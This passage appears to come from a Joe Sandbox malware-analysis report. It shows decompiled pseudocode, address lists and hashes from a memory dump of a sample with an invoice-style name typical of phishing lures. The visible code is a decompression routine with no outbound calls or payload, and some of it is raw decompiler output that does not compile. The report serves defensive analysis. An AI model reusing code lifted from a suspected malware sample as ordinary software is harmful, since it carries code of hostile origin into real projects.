													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406c2c
0x00406c2c
0x00406c30
0x00406c55
0x00406c5f
0x00000000
0x00406c32
0x00406c32
0x00406c35
0x00406c39
0x00406c3c
0x00406c3f
0x00406c43
0x00406c43
0x00406c46
0x00406d20
0x00406d20
0x00406d27
0x00406d27
0x00406d2a
0x00406d31
0x00406d5e
0x00406d62
0x00406dc2
0x00406dc5
0x00406dca
0x00406dcb
0x00406dcd
0x00406dcf
0x00406dd2
0x00406cde
0x00406cde
0x00406cde
0x0040647a
0x0040647a
0x0040647a
0x00406483
0x00000000
0x00000000
0x00406489
0x00000000
0x00406494
0x00000000
0x00000000
0x0040649d
0x004064a0
0x004064a3
0x004064a7
0x00000000
0x00000000
0x004064ad
0x004064b0
0x004064b2
0x004064b3
0x004064b6
0x004064b8
0x004064b9
0x004064bb
0x004064be
0x004064c3
0x004064c8
0x004064d1
0x004064e4
0x004064e7
0x004064f3
0x0040651b
0x0040651d
0x0040652b
0x0040652b
0x0040652f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040651f
0x0040651f
0x00406522
0x00406523
0x00406523
0x00000000
0x0040651f
0x004064f9
0x004064fe
0x004064fe
0x00406507
0x0040650f
0x00406512
0x00000000
0x00406518
0x00406518
0x00000000
0x00406518
0x00000000
0x00406535
0x00406535
0x00406539
0x00406de5
0x00000000
0x00406de5
0x00406542
0x00406552
0x00406555
0x00406558
0x00406558
0x00406558
0x0040655b
0x0040655f
0x00000000
0x00000000
0x00406561
0x00406567
0x00406591
0x00406597
0x0040659e
0x00000000
0x0040659e
0x0040656d
0x00406570
0x00406575
0x00406575
0x00406580
0x00406588
0x0040658b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004065d0
0x004065d6
0x004065d9
0x004065e6
0x004065ee
0x00000000
0x00000000
0x004065a5
0x004065a5
0x004065a9
0x00406df4
0x00000000
0x00406df4
0x004065b5
0x004065c0
0x004065c0
0x004065c0
0x004065c3
0x004065c6
0x004065c9
0x004065ce
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c65
0x00406c65
0x00406c6b
0x00406c71
0x00406c77
0x00406c91
0x00406c94
0x00406c9a
0x00406ca5
0x00406ca5
0x00406ca7
0x00406c79
0x00406c79
0x00406c88
0x00406c8c
0x00406c8c
0x00406cb1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406cb3
0x00406cb7
0x00406e66
0x00000000
0x00406e66
0x00406cc3
0x00406cca
0x00406cd2
0x00406cd5
0x00406cd8
0x00406cd8
0x00000000
0x00000000
0x004065f6
0x004065f8
0x004065fb
0x0040666c
0x0040666f
0x00406672
0x00406679
0x00406683
0x00000000
0x00406683
0x004065fd
0x00406601
0x00406604
0x00406606
0x00406609
0x0040660c
0x0040660e
0x00406611
0x00406613
0x00406618
0x0040661b
0x0040661e
0x00406622
0x00406629
0x0040662c
0x00406633
0x00406637
0x0040663f
0x0040663f
0x0040663f
0x00406639
0x00406639
0x00406639
0x0040662e
0x0040662e
0x0040662e
0x00406643
0x00406646
0x00406664
0x00406666
0x00000000
0x00406648
0x00406648
0x0040664b
0x0040664e
0x00406651
0x00406653
0x00406653
0x00406653
0x00406656
0x00406659
0x0040665b
0x0040665c
0x0040665f
0x00000000
0x0040665f
0x00000000
0x00406895
0x00406899
0x004068b7
0x004068ba
0x004068c1
0x004068c4
0x004068c7
0x004068ca
0x004068cd
0x004068d0
0x004068d2
0x004068d9
0x004068da
0x004068dc
0x004068df
0x004068e2
0x004068e5
0x004068e5
0x004068ea
0x00000000
0x004068ea
0x0040689b
0x0040689e
0x004068a1
0x004068ab
0x00000000
0x00000000
0x004068ff
0x00406903
0x00406926
0x00406929
0x0040692c
0x00406936
0x00406905
0x00406905
0x00406908
0x0040690b
0x0040690e
0x0040691b
0x0040691e
0x0040691e
0x00000000
0x00000000
0x00406942
0x00406946
0x00000000
0x00000000
0x0040694c
0x00406950
0x00000000
0x00000000
0x00406956
0x00406958
0x0040695c
0x0040695c
0x0040695f
0x00406963
0x00000000
0x00000000
0x004069b3
0x004069b7
0x004069be
0x004069c1
0x004069c4
0x004069ce
0x00000000
0x004069ce
0x004069b9
0x00000000
0x00000000
0x004069da
0x004069de
0x004069e5
0x004069e8
0x004069eb
0x004069e0
0x004069e0
0x004069e0
0x004069ee
0x004069f1
0x004069f4
0x004069f4
0x004069f7
0x004069fa
0x004069fd
0x004069fd
0x00406a00
0x00406a07
0x00406a0c
0x00000000
0x00000000
0x00406a9a
0x00406a9a
0x00406a9e
0x00406e3c
0x00000000
0x00406e3c
0x00406aa4
0x00406aa7
0x00406aaa
0x00406aae
0x00406ab1
0x00406ab7
0x00406ab9
0x00406ab9
0x00406ab9
0x00406abc
0x00406abf
0x00000000
0x00000000
0x0040668f
0x0040668f
0x00406693
0x00406e00
0x00000000
0x00406e00
0x00406699
0x0040669c
0x0040669f
0x004066a3
0x004066a6
0x004066ac
0x004066ae
0x004066ae
0x004066ae
0x004066b1
0x004066b4
0x004066b4
0x004066b7
0x004066ba
0x00000000
0x00000000
0x004066c0
0x004066c6
0x00000000
0x00000000
0x004066cc
0x004066cc
0x004066d0
0x004066d3
0x004066d6
0x004066d9
0x004066dc
0x004066dd
0x004066e0
0x004066e2
0x004066e8
0x004066eb
0x004066ee
0x004066f1
0x004066f4
0x004066f7
0x004066fa
0x00406716
0x00406719
0x0040671c
0x0040671f
0x00406726
0x0040672a
0x0040672c
0x00406730
0x004066fc
0x004066fc
0x00406700
0x00406708
0x0040670d
0x0040670f
0x00406711
0x00406711
0x00406733
0x0040673a
0x0040673d
0x00000000
0x00406743
0x00000000
0x00406743
0x00000000
0x00406748
0x00406748
0x0040674c
0x00406e0c
0x00000000
0x00406e0c
0x00406752
0x00406755
0x00406758
0x0040675c
0x0040675f
0x00406765
0x00406767
0x00406767
0x00406767
0x0040676a
0x0040676d
0x0040676d
0x0040676d
0x00406773
0x00000000
0x00000000
0x00406775
0x00406778
0x0040677b
0x0040677e
0x00406781
0x00406784
0x00406787
0x0040678a
0x0040678d
0x00406790
0x00406793
0x004067ab
0x004067ae
0x004067b1
0x004067b4
0x004067b4
0x004067b7
0x004067bb
0x004067bd
0x00406795
0x00406795
0x0040679d
0x004067a2
0x004067a4
0x004067a6
0x004067a6
0x004067c0
0x004067c7
0x004067ca
0x00000000
0x004067cc
0x00000000
0x004067cc
0x004067ca
0x004067d1
0x004067d1
0x004067d1
0x004067d1
0x00000000
0x00000000
0x0040680c
0x0040680c
0x00406810
0x00406e18
0x00000000
0x00406e18
0x00406816
0x00406819
0x0040681c
0x00406820
0x00406823
0x00406829
0x0040682b
0x0040682b
0x0040682b
0x0040682e
0x00406831
0x00406831
0x00406837
0x004067d5
0x004067d5
0x004067d8
0x00000000
0x004067d8
0x00406839
0x00406839
0x0040683c
0x0040683f
0x00406842
0x00406845
0x00406848
0x0040684b
0x0040684e
0x00406851
0x00406854
0x00406857
0x0040686f
0x00406872
0x00406875
0x00406878
0x00406878
0x0040687b
0x0040687f
0x00406881
0x00406859
0x00406859
0x00406861
0x00406866
0x00406868
0x0040686a
0x0040686a
0x00406884
0x0040688b
0x0040688e
0x00000000
0x00406890
0x00000000
0x00406890
0x00000000
0x00406b1d
0x00406b1d
0x00406b21
0x00406e48
0x00000000
0x00406e48
0x00406b27
0x00406b2a
0x00406b2d
0x00406b31
0x00406b34
0x00406b3a
0x00406b3c
0x00406b3c
0x00406b3c
0x00406b3f
0x00000000
0x00000000
0x004068ed
0x004068ed
0x004068f0
0x00406c62
0x00406c62
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ce9
0x00406ced
0x00406d0b
0x00406d0b
0x00406d0b
0x00406d12
0x00406d19
0x00000000
0x00406d19
0x00406cef
0x00406cf2
0x00406cf5
0x00406cf8
0x00406cff
0x00000000
0x00000000
0x00406dda
0x00406ddd
0x00406cde
0x00406cde
0x00000000
0x00000000
0x00406a14
0x00406a16
0x00406a1d
0x00406a1e
0x00406a20
0x00406a23
0x00000000
0x00000000
0x00406a2b
0x00406a2e
0x00406a31
0x00406a33
0x00406a35
0x00406a35
0x00406a36
0x00406a39
0x00406a40
0x00406a43
0x00406a51
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d36
0x00406d36
0x00406d3a
0x00406e72
0x00000000
0x00406e72
0x00406d40
0x00406d43
0x00406d46
0x00406d4a
0x00406d4d
0x00406d53
0x00406d55
0x00406d55
0x00406d55
0x00406d58
0x00406d5b
0x00406d5b
0x00406d5b
0x00406d5b
0x00000000
0x00000000
0x00406a59
0x00406a5c
0x00406a92
0x00406bc2
0x00406bc2
0x00406bc2
0x00406bc2
0x00406bc5
0x00406bc5
0x00406bc8
0x00406bca
0x00406e54
0x00000000
0x00406e54
0x00406bd0
0x00406bd3
0x00000000
0x00000000
0x00406bd9
0x00406bdd
0x00406be0
0x00406be0
0x00406be0
0x00000000
0x00406be0
0x00406a5e
0x00406a60
0x00406a62
0x00406a64
0x00406a67
0x00406a68
0x00406a6a
0x00406a6c
0x00406a6f
0x00406a72
0x00406a88
0x00406a8d
0x00406ac5
0x00406ac5
0x00406ac9
0x00406af5
0x00406af7
0x00406afe
0x00406b01
0x00406b04
0x00406b04
0x00406b09
0x00406b09
0x00406b0b
0x00406b0e
0x00406b15
0x00406b18
0x00406b45
0x00406b45
0x00406b48
0x00406b4b
0x00406bbf
0x00406bbf
0x00406bbf
0x00000000
0x00406bbf
0x00406b4d
0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b5f
0x00406b62
0x00406b65
0x00406b68
0x00406b6b
0x00406b6e
0x00406b87
0x00406b89
0x00406b8c
0x00406b8d
0x00406b90
0x00406b92
0x00406b95
0x00406b97
0x00406b99
0x00406b9c
0x00406b9e
0x00406ba1
0x00406ba5
0x00406ba7
0x00406ba7
0x00406ba8
0x00406bab
0x00406bae
0x00406b70
0x00406b70
0x00406b78
0x00406b7d
0x00406b7f
0x00406b82
0x00406b82
0x00406bb1
0x00406bb8
0x00406b42
0x00406b42
0x00406b42
0x00406b42
0x00000000
0x00406bba
0x00000000
0x00406bba
0x00406bb8
0x00406acb
0x00406ace
0x00406ad0
0x00406ad3
0x00406ad6
0x00406ad9
0x00406adb
0x00406ade
0x00406ae1
0x00406ae1
0x00406ae4
0x00406ae4
0x00406ae7
0x00406aee
0x00406ac2
0x00406ac2
0x00406ac2
0x00406ac2
0x00000000
0x00406af0
0x00000000
0x00406af0
0x00406aee
0x00406a74
0x00406a77
0x00406a79
0x00406a7c
0x00000000
0x00000000
0x004067db
0x004067db
0x004067df
0x00406e24
0x00000000
0x00406e24
0x004067e5
0x004067e8
0x004067eb
0x004067ee
0x004067f1
0x004067f4
0x004067f7
0x004067f9
0x004067fc
0x004067ff
0x00406802
0x00406804
0x00406804
0x00406804
0x00000000
0x00000000
0x00406966
0x00406966
0x0040696a
0x00406e30
0x00000000
0x00406e30
0x00406970
0x00406973
0x00406976
0x00406979
0x0040697b
0x0040697b
0x0040697b
0x0040697e
0x00406981
0x00406984
0x00406987
0x0040698a
0x0040698d
0x0040698e
0x00406990
0x00406990
0x00406990
0x00406993
0x00406996
0x00406999
0x0040699c
0x0040699c
0x0040699c
0x0040699f
0x004069a1
0x004069a1
0x00000000
0x00000000
0x00406be3
0x00406be3
0x00406be3
0x00406be7
0x00000000
0x00000000
0x00406bed
0x00406bf0
0x00406bf3
0x00406bf6
0x00406bf8
0x00406bf8
0x00406bf8
0x00406bfb
0x00406bfe
0x00406c01
0x00406c04
0x00406c07
0x00406c0a
0x00406c0b
0x00406c0d
0x00406c0d
0x00406c0d
0x00406c10
0x00406c13
0x00406c16
0x00406c19
0x00406c1c
0x00406c20
0x00406c22
0x00406c25
0x00000000
0x00406c27
0x004069a4
0x004069a4
0x00000000
0x004069a4
0x00406c25
0x00406e5a
0x00406e7c
0x00406e82
0x00406e84
0x00406e8b
0x00406e8d
0x00406e94
0x00406e98
0x00000000
0x00406489
0x00406e91
0x00406e91
0x00000000
0x00406e91
0x00406cde
0x00406d64
0x00406d6a
0x00406d6d
0x00406d70
0x00406d73
0x00406d76
0x00406d79
0x00406d7c
0x00406d7f
0x00406d85
0x00406d9e
0x00406da1
0x00406da4
0x00406da7
0x00406dab
0x00406dad
0x00406dae
0x00406db1
0x00406d87
0x00406d87
0x00406d8f
0x00406d94
0x00406d96
0x00406d99
0x00406d99
0x00406dbb
0x00000000
0x00406dbd
0x00000000
0x00406dbd
0x00406dbb
0x00000000
0x00406c30

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56f2a3a3000d6c7273ab2248f4ff10f601781423d0ca2bb331c25efff9829afe
Instruction ID: 3b3aa2dd6ba4133719dd3176c6350ec32f9f513342808bce88e7bfcf8f6a0710
Opcode Fuzzy Hash: 56f2a3a3000d6c7273ab2248f4ff10f601781423d0ca2bb331c25efff9829afe
Instruction Fuzzy Hash: F4913370E00229DBDF28CF98C8587ADBBB1FF44305F15802AD852BB291C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406942 Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406942() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00406E99))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
